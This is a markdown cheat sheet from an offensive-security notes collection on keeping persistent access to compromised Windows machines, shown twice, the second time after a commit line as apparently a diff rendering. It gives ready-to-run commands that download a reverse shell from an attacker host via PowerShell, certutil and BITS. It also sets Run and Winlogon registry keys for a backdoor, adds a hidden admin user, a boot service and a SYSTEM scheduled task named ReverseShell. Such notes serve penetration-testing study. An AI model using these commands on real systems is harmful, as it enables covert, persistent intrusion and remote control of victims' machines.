killchain-compendium/persistence/persistence.md

# Persistence

* Gain through
    * Startup folder persistence
    * Editing registry keys
    * Scheduled tasks
    * SUID
    * BITS
    * Creating a backdoored service
    * Creat user
    * RDP

## Gain Persistence on Windows
* Browser. Add to trusted sites.
* Powershell
```sh
Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
```
* DOSprompt
```cmd
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
```
* Use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp` 
### Paths to Persistence
* Put in startup directory
```sh
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
* Put the reverse_shell into `%appdata%` and add a registry key
```sh
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe" 
```
### Background Intelligence Transfer Service (BITS)
```sh
bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
```
```sh
bitsadmin /SetNotifyCmdLine 1 cmd.exe  "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay 30
bitsadmin /resume
```

## High Priv 
* Create user `net user /add <user> <pass>`
* Add to admin group via `net localgroup Administrator <user> /add` 
* Check `net localgroup Administrator`

### Add to registry
* Execute on user logon via
```sh
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
```
### Add a Service
* Inside meterpreter `load powershell` and `powershell_shell`
```sh
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"
```
### Add Scheduled Task
```sh
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E
```
bump 2021-09-08 02:09:14 +02:00			`# Persistence`

			`* Gain through`
			`* Startup folder persistence`
			`* Editing registry keys`
			`* Scheduled tasks`
			`* SUID`
			`* BITS`
			`* Creating a backdoored service`
			`* Creat user`
			`* RDP`

			`## Gain Persistence on Windows`
			`* Browser. Add to trusted sites.`
			`* Powershell`
			```sh
			`Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe`
			```
			`* DOSprompt`
			```cmd
			`certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe`
			```
			* Use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp`
			`### Paths to Persistence`
			`* Put in startup directory`
			```sh
			`C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup`
			```
			* Put the reverse_shell into `%appdata%` and add a registry key
			```sh
			`reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe"`
			```
			`### Background Intelligence Transfer Service (BITS)`
			```sh
			`bitsadmin /create __shell__`
			`bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"`
			```
			```sh
			`bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ \| start /B C:\Users\<USER>\Documents\shell2.exe"`
			`bitsadmin /SetMinRetryDelay 30`
			`bitsadmin /resume`
			```

			`## High Priv`
			* Create user `net user /add <user> <pass>`
			* Add to admin group via `net localgroup Administrator <user> /add`
			* Check `net localgroup Administrator`

			`### Add to registry`
			`* Execute on user logon via`
			```sh
			`reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f`
			```
			`### Add a Service`
			* Inside meterpreter `load powershell` and `powershell_shell`
			```sh
			`New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"`
			```
			`### Add Scheduled Task`
			```sh
			`$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe`
			`$B = New-ScheduledTaskTrigger -AtLogOn`
			`$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest`
			`$D = New-ScheduledTaskSettingsSet`
			`$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D`
			`Register-ScheduledTask ReverseShell -InputObject $E`
			```